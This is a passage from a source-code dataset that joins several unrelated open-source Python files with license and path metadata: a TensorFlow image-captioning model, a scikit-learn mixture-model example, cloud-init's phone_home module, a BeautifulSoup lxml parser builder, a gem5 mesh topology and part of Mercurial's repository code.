def build_image_embeddings(self, images):
"""Builds the image model subgraph and generates image embeddings.
Inputs:
images
Outputs:
self.image_embeddings
"""
images = self.distort_images(images, tf.train.get_or_create_global_step())
inception_output = image_embedding.inception_v3(
images,
trainable=self.train_inception,
is_training=self.is_training(),
add_summaries=False)
self.inception_variables = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope="InceptionV3")
# Map inception output into embedding space.
with tf.variable_scope("image_embedding") as scope:
image_embeddings = tf.contrib.layers.fully_connected(
inputs=inception_output,
num_outputs=self.config.embedding_size,
activation_fn=None,
weights_initializer=self.initializer,
biases_initializer=None,
scope=scope)
# Save the embedding size in the graph.
tf.constant(self.config.embedding_size, name="embedding_size")
return image_embeddings
def build_seq_embeddings(self, input_seqs):
"""Builds the input sequence embeddings.
Inputs:
input_seqs
Outputs:
self.seq_embeddings
"""
with tf.variable_scope("seq_embedding"), tf.device("/cpu:0"):
embedding_map = tf.get_variable(
name="map",
shape=[self.config.vocab_size, self.config.embedding_size],
initializer=self.initializer)
seq_embeddings = tf.nn.embedding_lookup(embedding_map, input_seqs)
return seq_embeddings
def build_model(self):
"""Builds the model.
Inputs:
self.image_embeddings
self.seq_embeddings
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
Outputs:
self.total_loss (training and eval only)
self.target_cross_entropy_losses (training and eval only)
self.target_cross_entropy_loss_weights (training and eval only)
"""
# This LSTM cell has biases and outputs tanh(new_c) * sigmoid(o), but the
# modified LSTM in the "Show and Tell" paper has no biases and outputs
# new_c * sigmoid(o).
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_units=self.config.num_lstm_units, state_is_tuple=True)
if self.mode == "train":
lstm_cell = tf.contrib.rnn.DropoutWrapper(
lstm_cell,
input_keep_prob=self.config.lstm_dropout_keep_prob,
output_keep_prob=self.config.lstm_dropout_keep_prob)
with tf.variable_scope("lstm", initializer=self.initializer) as lstm_scope:
# Feed the image embeddings to set the initial LSTM state.
zero_state = lstm_cell.zero_state(
batch_size=self.image_embeddings.get_shape()[0], dtype=tf.float32)
_, initial_state = lstm_cell(self.image_embeddings, zero_state)
# Allow the LSTM variables to be reused.
lstm_scope.reuse_variables()
if self.mode == "inference":
# In inference mode, use concatenated states for convenient feeding and
# fetching.
tf.concat(initial_state, 1, name="initial_state")
# Placeholder for feeding a batch of concatenated states.
state_feed = tf.placeholder(
dtype=tf.float32,
shape=[None, sum(lstm_cell.state_size)],
name="state_feed")
state_tuple = tf.split(value=state_feed, num_or_size_splits=2, axis=1)
# Run a single LSTM step.
lstm_outputs, state_tuple = lstm_cell(
inputs=tf.squeeze(self.seq_embeddings, squeeze_dims=[1]),
state=state_tuple)
# Concatentate the resulting state.
tf.concat(state_tuple, 1, name="state")
else:
# Run the batch of sequence embeddings through the LSTM.
sequence_length = tf.reduce_sum(self.input_mask, 1)
lstm_outputs, _ = tf.nn.dynamic_rnn(
cell=lstm_cell,
inputs=self.seq_embeddings,
sequence_length=sequence_length,
initial_state=initial_state,
dtype=tf.float32,
scope=lstm_scope)
# Stack batches vertically.
lstm_outputs = tf.reshape(lstm_outputs, [-1, lstm_cell.output_size])
with tf.variable_scope("logits") as logits_scope:
logits = tf.contrib.layers.fully_connected(
inputs=lstm_outputs,
num_outputs=self.config.vocab_size,
activation_fn=None,
weights_initializer=self.initializer,
scope=logits_scope)
if self.mode == "inference":
tf.nn.softmax(logits, name="softmax")
else:
targets = tf.reshape(self.target_seqs, [-1])
weights = tf.to_float(tf.reshape(self.input_mask, [-1]))
# Compute losses.
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=logits)
batch_loss = tf.div(
tf.reduce_sum(tf.multiply(losses, weights)),
tf.reduce_sum(weights),
name="batch_loss")
tf.losses.add_loss(batch_loss)
total_loss = tf.losses.get_total_loss()
self.total_loss = total_loss
self.target_cross_entropy_losses = losses # Used in evaluation.
self.target_cross_entropy_loss_weights = weights # Used in evaluation.
def setup_inception_initializer(self):
"""Sets up the function to restore inception variables from checkpoint."""
if self.mode != "inference":
# Restore inception variables only.
saver = tf.train.Saver(self.inception_variables)
def restore_fn(sess):
tf.logging.info("Restoring Inception variables from checkpoint file %s",
self.config.inception_checkpoint_file)
saver.restore(sess, self.config.inception_checkpoint_file)
self.init_fn = restore_fn
def setup_global_step(self):
"""Sets up the global step Tensor."""
self.global_step = tf.train.get_or_create_global_step()
def build_model_for_tpu(self, images, input_seqs, target_seqs, input_mask):
self.image_embeddings = self.build_image_embeddings(images)
self.seq_embeddings = self.build_seq_embeddings(target_seqs)
self.target_seqs = target_seqs
self.input_mask = input_mask
self.build_model()
def build(self):
"""Creates all ops for training and evaluation."""
self.build_inputs()
self.image_embeddings = self.build_image_embeddings(self.images)
self.seq_embeddings = self.build_seq_embeddings(self.input_seqs)
self.build_model()
self.setup_inception_initializer()
self.setup_global_step()
| apache-2.0 |
h2educ/scikit-learn | examples/mixture/plot_gmm_sin.py | 248 | 2747 | """
=================================
Gaussian Mixture Model Sine Curve
=================================
This example highlights the advantages of the Dirichlet Process:
complexity control and dealing with sparse data. The dataset is formed
by 100 points loosely spaced following a noisy sine curve. The fit by
the GMM class, using the expectation-maximization algorithm to fit a
mixture of 10 Gaussian components, finds too-small components and very
little structure. The fits by the Dirichlet process, however, show
that the model can either learn a global structure for the data (small
alpha) or easily interpolate to finding relevant local structure
(large alpha), never falling into the problems shown by the GMM class.
"""
import itertools
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn import mixture
from sklearn.externals.six.moves import xrange
# Number of samples per component
n_samples = 100
# Generate random sample following a sine curve
np.random.seed(0)
X = np.zeros((n_samples, 2))
step = 4 * np.pi / n_samples
for i in xrange(X.shape[0]):
x = i * step - 6
X[i, 0] = x + np.random.normal(0, 0.1)
X[i, 1] = 3 * (np.sin(x) + np.random.normal(0, .2))
color_iter = itertools.cycle(['r', 'g', 'b', 'c', 'm'])
for i, (clf, title) in enumerate([
(mixture.GMM(n_components=10, covariance_type='full', n_iter=100),
"Expectation-maximization"),
(mixture.DPGMM(n_components=10, covariance_type='full', alpha=0.01,
n_iter=100),
"Dirichlet Process,alpha=0.01"),
(mixture.DPGMM(n_components=10, covariance_type='diag', alpha=100.,
n_iter=100),
"Dirichlet Process,alpha=100.")]):
clf.fit(X)
splot = plt.subplot(3, 1, 1 + i)
Y_ = clf.predict(X)
for i, (mean, covar, color) in enumerate(zip(
clf.means_, clf._get_covars(), color_iter)):
v, w = linalg.eigh(covar)
u = w[0] / linalg.norm(w[0])
# as the DP will not use every component it has access to
# unless it needs it, we shouldn't plot the redundant
# components.
if not np.any(Y_ == i):
continue
plt.scatter(X[Y_ == i, 0], X[Y_ == i, 1], .8, color=color)
# Plot an ellipse to show the Gaussian component
angle = np.arctan(u[1] / u[0])
angle = 180 * angle / np.pi # convert to degrees
ell = mpl.patches.Ellipse(mean, v[0], v[1], 180 + angle, color=color)
ell.set_clip_box(splot.bbox)
ell.set_alpha(0.5)
splot.add_artist(ell)
plt.xlim(-6, 4 * np.pi - 6)
plt.ylim(-5, 5)
plt.title(title)
plt.xticks(())
plt.yticks(())
plt.show()
| bsd-3-clause |
racker/cloud-init-debian-pkg | cloudinit/config/cc_phone_home.py | 6 | 3666 | # vi: ts=4 expandtab
#
# Copyright (C) 2011 Canonical Ltd.
# Copyright (C) 2012, 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Scott Moser <scott.moser@canonical.com>
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from cloudinit import templater
from cloudinit import util
from cloudinit.settings import PER_INSTANCE
frequency = PER_INSTANCE
POST_LIST_ALL = [
'pub_key_dsa',
'pub_key_rsa',
'pub_key_ecdsa',
'instance_id',
'hostname'
]
# phone_home:
# url: http://my.foo.bar/$INSTANCE/
# post: all
# tries: 10
#
# phone_home:
# url: http://my.foo.bar/$INSTANCE_ID/
# post: [ pub_key_dsa, pub_key_rsa, pub_key_ecdsa, instance_id
#
def handle(name, cfg, cloud, log, args):
if len(args) != 0:
ph_cfg = util.read_conf(args[0])
else:
if not 'phone_home' in cfg:
log.debug(("Skipping module named %s, "
"no 'phone_home' configuration found"), name)
return
ph_cfg = cfg['phone_home']
if 'url' not in ph_cfg:
log.warn(("Skipping module named %s, "
"no 'url' found in 'phone_home' configuration"), name)
return
url = ph_cfg['url']
post_list = ph_cfg.get('post', 'all')
tries = ph_cfg.get('tries')
try:
tries = int(tries)
except:
tries = 10
util.logexc(log, "Configuration entry 'tries' is not an integer, "
"using %s instead", tries)
if post_list == "all":
post_list = POST_LIST_ALL
all_keys = {}
all_keys['instance_id'] = cloud.get_instance_id()
all_keys['hostname'] = cloud.get_hostname()
pubkeys = {
'pub_key_dsa': '/etc/ssh/ssh_host_dsa_key.pub',
'pub_key_rsa': '/etc/ssh/ssh_host_rsa_key.pub',
'pub_key_ecdsa': '/etc/ssh/ssh_host_ecdsa_key.pub',
}
for (n, path) in pubkeys.iteritems():
try:
all_keys[n] = util.load_file(path)
except:
util.logexc(log, "%s: failed to open, can not phone home that "
"data!", path)
submit_keys = {}
for k in post_list:
if k in all_keys:
submit_keys[k] = all_keys[k]
else:
submit_keys[k] = None
log.warn(("Requested key %s from 'post'"
" configuration list not available"), k)
# Get them read to be posted
real_submit_keys = {}
for (k, v) in submit_keys.iteritems():
if v is None:
real_submit_keys[k] = 'N/A'
else:
real_submit_keys[k] = str(v)
# Incase the url is parameterized
url_params = {
'INSTANCE_ID': all_keys['instance_id'],
}
url = templater.render_string(url, url_params)
try:
util.read_file_or_url(url, data=real_submit_keys,
retries=tries, sec_between=3,
ssl_details=util.fetch_ssl_details(cloud.paths))
except:
util.logexc(log, "Failed to post phone home data to %s in %s tries",
url, tries)
| gpl-3.0 |
crookedreyes/py4e-specialization | course-5/week-02/pagerank-ori/bs4/builder/_lxml.py | 24 | 9031 | __all__ = [
'LXMLTreeBuilderForXML',
'LXMLTreeBuilder',
]
from io import BytesIO
from io import StringIO
import collections
from lxml import etree
from bs4.element import (
Comment,
Doctype,
NamespacedAttribute,
ProcessingInstruction,
)
from bs4.builder import (
FAST,
HTML,
HTMLTreeBuilder,
PERMISSIVE,
ParserRejectedMarkup,
TreeBuilder,
XML)
from bs4.dammit import EncodingDetector
LXML = 'lxml'
class LXMLTreeBuilderForXML(TreeBuilder):
DEFAULT_PARSER_CLASS = etree.XMLParser
is_xml = True
NAME = "lxml-xml"
ALTERNATE_NAMES = ["xml"]
# Well, it's permissive by XML parser standards.
features = [NAME, LXML, XML, FAST, PERMISSIVE]
CHUNK_SIZE = 512
# This namespace mapping is specified in the XML Namespace
# standard.
DEFAULT_NSMAPS = {'http://www.w3.org/XML/1998/namespace' : "xml"}
def default_parser(self, encoding):
# This can either return a parser object or a class, which
# will be instantiated with default arguments.
if self._default_parser is not None:
return self._default_parser
return etree.XMLParser(
target=self, strip_cdata=False, recover=True, encoding=encoding)
def parser_for(self, encoding):
# Use the default parser.
parser = self.default_parser(encoding)
if isinstance(parser, collections.Callable):
# Instantiate the parser with default arguments
parser = parser(target=self, strip_cdata=False, encoding=encoding)
return parser
def __init__(self, parser=None, empty_element_tags=None):
# TODO: Issue a warning if parser is present but not a
# callable, since that means there's no way to create new
# parsers for different encodings.
self._default_parser = parser
if empty_element_tags is not None:
self.empty_element_tags = set(empty_element_tags)
self.soup = None
self.nsmaps = [self.DEFAULT_NSMAPS]
def _getNsTag(self, tag):
# Split the namespace URL out of a fully-qualified lxml tag
# name. Copied from lxml's src/lxml/sax.py.
if tag[0] == '{':
return tuple(tag[1:].split('}', 1))
else:
return (None, tag)
def prepare_markup(self, markup, user_specified_encoding=None,
exclude_encodings=None,
document_declared_encoding=None):
"""
:yield: A series of 4-tuples.
(markup, encoding, declared encoding,
has undergone character replacement)
Each 4-tuple represents a strategy for parsing the document.
"""
if isinstance(markup, str):
# We were given Unicode. Maybe lxml can parse Unicode on
# this system?
yield markup, None, document_declared_encoding, False
if isinstance(markup, str):
# No, apparently not. Convert the Unicode to UTF-8 and
# tell lxml to parse it as UTF-8.
yield (markup.encode("utf8"), "utf8",
document_declared_encoding, False)
# Instead of using UnicodeDammit to convert the bytestring to
# Unicode using different encodings, use EncodingDetector to
# iterate over the encodings, and tell lxml to try to parse
# the document as each one in turn.
is_html = not self.is_xml
try_encodings = [user_specified_encoding, document_declared_encoding]
detector = EncodingDetector(
markup, try_encodings, is_html, exclude_encodings)
for encoding in detector.encodings:
yield (detector.markup, encoding, document_declared_encoding, False)
def feed(self, markup):
if isinstance(markup, bytes):
markup = BytesIO(markup)
elif isinstance(markup, str):
markup = StringIO(markup)
# Call feed() at least once, even if the markup is empty,
# or the parser won't be initialized.
data = markup.read(self.CHUNK_SIZE)
try:
self.parser = self.parser_for(self.soup.original_encoding)
self.parser.feed(data)
while len(data) != 0:
# Now call feed() on the rest of the data, chunk by chunk.
data = markup.read(self.CHUNK_SIZE)
if len(data) != 0:
self.parser.feed(data)
self.parser.close()
except (UnicodeDecodeError, LookupError, etree.ParserError) as e:
raise ParserRejectedMarkup(str(e))
def close(self):
self.nsmaps = [self.DEFAULT_NSMAPS]
def start(self, name, attrs, nsmap={}):
# Make sure attrs is a mutable dict--lxml may send an immutable dictproxy.
attrs = dict(attrs)
nsprefix = None
# Invert each namespace map as it comes in.
if len(self.nsmaps) > 1:
# There are no new namespaces for this tag, but
# non-default namespaces are in play, so we need a
# separate tag stack to know when they end.
self.nsmaps.append(None)
elif len(nsmap) > 0:
# A new namespace mapping has come into play.
inverted_nsmap = dict((value, key) for key, value in list(nsmap.items()))
self.nsmaps.append(inverted_nsmap)
# Also treat the namespace mapping as a set of attributes on the
# tag, so we can recreate it later.
attrs = attrs.copy()
for prefix, namespace in list(nsmap.items()):
attribute = NamespacedAttribute(
"xmlns", prefix, "http://www.w3.org/2000/xmlns/")
attrs[attribute] = namespace
# Namespaces are in play. Find any attributes that came in
# from lxml with namespaces attached to their names, and
# turn then into NamespacedAttribute objects.
new_attrs = {}
for attr, value in list(attrs.items()):
namespace, attr = self._getNsTag(attr)
if namespace is None:
new_attrs[attr] = value
else:
nsprefix = self._prefix_for_namespace(namespace)
attr = NamespacedAttribute(nsprefix, attr, namespace)
new_attrs[attr] = value
attrs = new_attrs
namespace, name = self._getNsTag(name)
nsprefix = self._prefix_for_namespace(namespace)
self.soup.handle_starttag(name, namespace, nsprefix, attrs)
def _prefix_for_namespace(self, namespace):
"""Find the currently active prefix for the given namespace."""
if namespace is None:
return None
for inverted_nsmap in reversed(self.nsmaps):
if inverted_nsmap is not None and namespace in inverted_nsmap:
return inverted_nsmap[namespace]
return None
def end(self, name):
self.soup.endData()
completed_tag = self.soup.tagStack[-1]
namespace, name = self._getNsTag(name)
nsprefix = None
if namespace is not None:
for inverted_nsmap in reversed(self.nsmaps):
if inverted_nsmap is not None and namespace in inverted_nsmap:
nsprefix = inverted_nsmap[namespace]
break
self.soup.handle_endtag(name, nsprefix)
if len(self.nsmaps) > 1:
# This tag, or one of its parents, introduced a namespace
# mapping, so pop it off the stack.
self.nsmaps.pop()
def pi(self, target, data):
self.soup.endData()
self.soup.handle_data(target + ' ' + data)
self.soup.endData(ProcessingInstruction)
def data(self, content):
self.soup.handle_data(content)
def doctype(self, name, pubid, system):
self.soup.endData()
doctype = Doctype.for_name_and_ids(name, pubid, system)
self.soup.object_was_parsed(doctype)
def comment(self, content):
"Handle comments as Comment objects."
self.soup.endData()
self.soup.handle_data(content)
self.soup.endData(Comment)
def test_fragment_to_document(self, fragment):
"""See `TreeBuilder`."""
return '<?xml version="1.0" encoding="utf-8"?>\n%s' % fragment
class LXMLTreeBuilder(HTMLTreeBuilder, LXMLTreeBuilderForXML):
NAME = LXML
ALTERNATE_NAMES = ["lxml-html"]
features = ALTERNATE_NAMES + [NAME, HTML, FAST, PERMISSIVE]
is_xml = False
def default_parser(self, encoding):
return etree.HTMLParser
def feed(self, markup):
encoding = self.soup.original_encoding
try:
self.parser = self.parser_for(encoding)
self.parser.feed(markup)
self.parser.close()
except (UnicodeDecodeError, LookupError, etree.ParserError) as e:
raise ParserRejectedMarkup(str(e))
def test_fragment_to_document(self, fragment):
"""See `TreeBuilder`."""
return '<html><body>%s</body></html>' % fragment
| lgpl-2.1 |
lixt/lily2-gem5 | configs/topologies/MeshDirCorners.py | 15 | 6049 | # Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
from m5.params import *
from m5.objects import *
from BaseTopology import SimpleTopology
class MeshDirCorners(SimpleTopology):
description='MeshDirCorners'
def __init__(self, controllers):
self.nodes = controllers
# This file contains a special network creation function. This
# networks is not general and will only work with specific system
# configurations. The network specified is similar to GEMS old file
# specified network.
def makeTopology(self, options, IntLink, ExtLink, Router):
nodes = self.nodes
num_routers = options.num_cpus
num_rows = options.mesh_rows
# First determine which nodes are cache cntrls vs. dirs vs. dma
cache_nodes = []
dir_nodes = []
dma_nodes = []
for node in nodes:
if node.type == 'L1Cache_Controller' or \
node.type == 'L2Cache_Controller':
cache_nodes.append(node)
elif node.type == 'Directory_Controller':
dir_nodes.append(node)
elif node.type == 'DMA_Controller':
dma_nodes.append(node)
# Obviously the number or rows must be <= the number of routers
# and evenly divisible. Also the number of caches must be a
# multiple of the number of routers and the number of directories
# must be four.
assert(num_rows <= num_routers)
num_columns = int(num_routers / num_rows)
assert(num_columns * num_rows == num_routers)
caches_per_router, remainder = divmod(len(cache_nodes), num_routers)
assert(remainder == 0)
assert(len(dir_nodes) == 4)
# Create the routers in the mesh
routers = [Router(router_id=i) for i in range(num_routers)]
# link counter to set unique link ids
link_count = 0
# Connect each cache controller to the appropriate router
ext_links = []
for (i, n) in enumerate(cache_nodes):
cntrl_level, router_id = divmod(i, num_routers)
assert(cntrl_level < caches_per_router)
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id]))
link_count += 1
# Connect the dir nodes to the corners.
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[0],
int_node=routers[0]))
link_count += 1
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[1],
int_node=routers[num_columns - 1]))
link_count += 1
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[2],
int_node=routers[num_routers - num_columns]))
link_count += 1
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[3],
int_node=routers[num_routers - 1]))
link_count += 1
# Connect the dma nodes to router 0. These should only be DMA nodes.
for (i, node) in enumerate(dma_nodes):
assert(node.type == 'DMA_Controller')
ext_links.append(ExtLink(link_id=link_count, ext_node=node, int_node=routers[0]))
# Create the mesh links. First row (east-west) links then column
# (north-south) links
int_links = []
for row in xrange(num_rows):
for col in xrange(num_columns):
if (col + 1 < num_columns):
east_id = col + (row * num_columns)
west_id = (col + 1) + (row * num_columns)
int_links.append(IntLink(link_id=link_count,
node_a=routers[east_id],
node_b=routers[west_id],
weight=1))
link_count += 1
for col in xrange(num_columns):
for row in xrange(num_rows):
if (row + 1 < num_rows):
north_id = col + (row * num_columns)
south_id = col + ((row + 1) * num_columns)
int_links.append(IntLink(link_id=link_count,
node_a=routers[north_id],
node_b=routers[south_id],
weight=2))
link_count += 1
return routers, int_links, ext_links
| bsd-3-clause |
ingokegel/intellij-community | plugins/hg4idea/testData/bin/mercurial/hg.py | 90 | 21956 | # hg.py - repository classes for mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from i18n import _
from lock import release
from node import hex, nullid
import localrepo, bundlerepo, unionrepo, httppeer, sshpeer, statichttprepo
import bookmarks, lock, util, extensions, error, node, scmutil, phases, url
import cmdutil, discovery
import merge as mergemod
import verify as verifymod
import errno, os, shutil
def _local(path):
path = util.expandpath(util.urllocalpath(path))
return (os.path.isfile(path) and bundlerepo or localrepo)
def addbranchrevs(lrepo, other, branches, revs):
peer = other.peer() # a courtesy to callers using a localrepo for other
hashbranch, branches = branches
if not hashbranch and not branches:
return revs or None, revs and revs[0] or None
revs = revs and list(revs) or []
if not peer.capable('branchmap'):
if branches:
raise util.Abort(_("remote branch lookup not supported"))
revs.append(hashbranch)
return revs, revs[0]
branchmap = peer.branchmap()
def primary(branch):
if branch == '.':
if not lrepo:
raise util.Abort(_("dirstate branch not accessible"))
branch = lrepo.dirstate.branch()
if branch in branchmap:
revs.extend(node.hex(r) for r in reversed(branchmap[branch]))
return True
else:
return False
for branch in branches:
if not primary(branch):
raise error.RepoLookupError(_("unknown branch '%s'") % branch)
if hashbranch:
if not primary(hashbranch):
revs.append(hashbranch)
return revs, revs[0]
def parseurl(path, branches=None):
'''parse url#branch, returning (url, (branch, branches))'''
u = util.url(path)
branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
return str(u), (branch, branches or [])
schemes = {
'bundle': bundlerepo,
'union': unionrepo,
'file': _local,
'http': httppeer,
'https': httppeer,
'ssh': sshpeer,
'static-http': statichttprepo,
}
def _peerlookup(path):
u = util.url(path)
scheme = u.scheme or 'file'
thing = schemes.get(scheme) or schemes['file']
try:
return thing(path)
except TypeError:
return thing
def islocal(repo):
'''return true if repo or path is local'''
if isinstance(repo, str):
try:
return _peerlookup(repo).islocal(repo)
except AttributeError:
return False
return repo.local()
def openpath(ui, path):
'''open path with open if local, url.open if remote'''
if islocal(path):
return util.posixfile(util.urllocalpath(path), 'rb')
else:
return url.open(ui, path)
def _peerorrepo(ui, path, create=False):
"""return a repository object for the specified path"""
obj = _peerlookup(path).instance(ui, path, create)
ui = getattr(obj, "ui", ui)
for name, module in extensions.extensions():
hook = getattr(module, 'reposetup', None)
if hook:
hook(ui, obj)
return obj
def repository(ui, path='', create=False):
"""return a repository object for the specified path"""
peer = _peerorrepo(ui, path, create)
repo = peer.local()
if not repo:
raise util.Abort(_("repository '%s' is not local") %
(path or peer.url()))
return repo.filtered('visible')
def peer(uiorrepo, opts, path, create=False):
'''return a repository peer for the specified path'''
rui = remoteui(uiorrepo, opts)
return _peerorrepo(rui, path, create).peer()
def defaultdest(source):
'''return default destination of clone if none is given'''
return os.path.basename(os.path.normpath(util.url(source).path or ''))
def share(ui, source, dest=None, update=True):
'''create a shared repository'''
if not islocal(source):
raise util.Abort(_('can only share local repositories'))
if not dest:
dest = defaultdest(source)
else:
dest = ui.expandpath(dest)
if isinstance(source, str):
origsource = ui.expandpath(source)
source, branches = parseurl(origsource)
srcrepo = repository(ui, source)
rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
else:
srcrepo = source.local()
origsource = source = srcrepo.url()
checkout = None
sharedpath = srcrepo.sharedpath # if our source is already sharing
root = os.path.realpath(dest)
roothg = os.path.join(root, '.hg')
if os.path.exists(roothg):
raise util.Abort(_('destination already exists'))
if not os.path.isdir(root):
os.mkdir(root)
util.makedir(roothg, notindexed=True)
requirements = ''
try:
requirements = srcrepo.opener.read('requires')
except IOError, inst:
if inst.errno != errno.ENOENT:
raise
requirements += 'shared\n'
util.writefile(os.path.join(roothg, 'requires'), requirements)
util.writefile(os.path.join(roothg, 'sharedpath'), sharedpath)
r = repository(ui, root)
default = srcrepo.ui.config('paths', 'default')
if default:
fp = r.opener("hgrc", "w", text=True)
fp.write("[paths]\n")
fp.write("default = %s\n" % default)
fp.close()
if update:
r.ui.status(_("updating working directory\n"))
if update is not True:
checkout = update
for test in (checkout, 'default', 'tip'):
if test is None:
continue
try:
uprev = r.lookup(test)
break
except error.RepoLookupError:
continue
_update(r, uprev)
def copystore(ui, srcrepo, destpath):
'''copy files from store of srcrepo in destpath
returns destlock
'''
destlock = None
try:
hardlink = None
num = 0
srcpublishing = srcrepo.ui.configbool('phases', 'publish', True)
for f in srcrepo.store.copylist():
if srcpublishing and f.endswith('phaseroots'):
continue
src = os.path.join(srcrepo.sharedpath, f)
dst = os.path.join(destpath, f)
dstbase = os.path.dirname(dst)
if dstbase and not os.path.exists(dstbase):
os.mkdir(dstbase)
if os.path.exists(src):
if dst.endswith('data'):
# lock to avoid premature writing to the target
destlock = lock.lock(os.path.join(dstbase, "lock"))
hardlink, n = util.copyfiles(src, dst, hardlink)
num += n
if hardlink:
ui.debug("linked %d files\n" % num)
else:
ui.debug("copied %d files\n" % num)
return destlock
except: # re-raises
release(destlock)
raise
def clone(ui, peeropts, source, dest=None, pull=False, rev=None,
update=True, stream=False, branch=None):
"""Make a copy of an existing repository.
Create a copy of an existing repository in a new directory. The
source and destination are URLs, as passed to the repository
function. Returns a pair of repository peers, the source and
newly created destination.
The location of the source is added to the new repository's
.hg/hgrc file, as the default to be used for future pulls and
pushes.
If an exception is raised, the partly cloned/updated destination
repository will be deleted.
Arguments:
source: repository object or URL
dest: URL of destination repository to create (defaults to base
name of source repository)
pull: always pull from source repository, even in local case
stream: stream raw data uncompressed from repository (fast over
LAN, slow over WAN)
rev: revision to clone up to (implies pull=True)
update: update working directory after clone completes, if
destination is local repository (True means update to default rev,
anything else is treated as a revision)
branch: branches to clone
"""
if isinstance(source, str):
origsource = ui.expandpath(source)
source, branch = parseurl(origsource, branch)
srcpeer = peer(ui, peeropts, source)
else:
srcpeer = source.peer() # in case we were called with a localrepo
branch = (None, branch or [])
origsource = source = srcpeer.url()
rev, checkout = addbranchrevs(srcpeer, srcpeer, branch, rev)
if dest is None:
dest = defaultdest(source)
ui.status(_("destination directory: %s\n") % dest)
else:
dest = ui.expandpath(dest)
dest = util.urllocalpath(dest)
source = util.urllocalpath(source)
if not dest:
raise util.Abort(_("empty destination path is not valid"))
if os.path.exists(dest):
if not os.path.isdir(dest):
raise util.Abort(_("destination '%s' already exists") % dest)
elif os.listdir(dest):
raise util.Abort(_("destination '%s' is not empty") % dest)
srclock = destlock = cleandir = None
srcrepo = srcpeer.local()
try:
abspath = origsource
if islocal(origsource):
abspath = os.path.abspath(util.urllocalpath(origsource))
if islocal(dest):
cleandir = dest
copy = False
if (srcrepo and srcrepo.cancopy() and islocal(dest)
and not phases.hassecret(srcrepo)):
copy = not pull and not rev
if copy:
try:
# we use a lock here because if we race with commit, we
# can end up with extra data in the cloned revlogs that's
# not pointed to by changesets, thus causing verify to
# fail
srclock = srcrepo.lock(wait=False)
except error.LockError:
copy = False
if copy:
srcrepo.hook('preoutgoing', throw=True, source='clone')
hgdir = os.path.realpath(os.path.join(dest, ".hg"))
if not os.path.exists(dest):
os.mkdir(dest)
else:
# only clean up directories we create ourselves
cleandir = hgdir
try:
destpath = hgdir
util.makedir(destpath, notindexed=True)
except OSError, inst:
if inst.errno == errno.EEXIST:
cleandir = None
raise util.Abort(_("destination '%s' already exists")
% dest)
raise
destlock = copystore(ui, srcrepo, destpath)
# Recomputing branch cache might be slow on big repos,
# so just copy it
dstcachedir = os.path.join(destpath, 'cache')
srcbranchcache = srcrepo.sjoin('cache/branchheads')
dstbranchcache = os.path.join(dstcachedir, 'branchheads')
if os.path.exists(srcbranchcache):
if not os.path.exists(dstcachedir):
os.mkdir(dstcachedir)
util.copyfile(srcbranchcache, dstbranchcache)
# we need to re-init the repo after manually copying the data
# into it
destpeer = peer(srcrepo, peeropts, dest)
srcrepo.hook('outgoing', source='clone',
node=node.hex(node.nullid))
else:
try:
destpeer = peer(srcrepo or ui, peeropts, dest, create=True)
# only pass ui when no srcrepo
except OSError, inst:
if inst.errno == errno.EEXIST:
cleandir = None
raise util.Abort(_("destination '%s' already exists")
% dest)
raise
revs = None
if rev:
if not srcpeer.capable('lookup'):
raise util.Abort(_("src repository does not support "
"revision lookup and so doesn't "
"support clone by revision"))
revs = [srcpeer.lookup(r) for r in rev]
checkout = revs[0]
if destpeer.local():
destpeer.local().clone(srcpeer, heads=revs, stream=stream)
elif srcrepo:
srcrepo.push(destpeer, revs=revs)
else:
raise util.Abort(_("clone from remote to remote not supported"))
cleandir = None
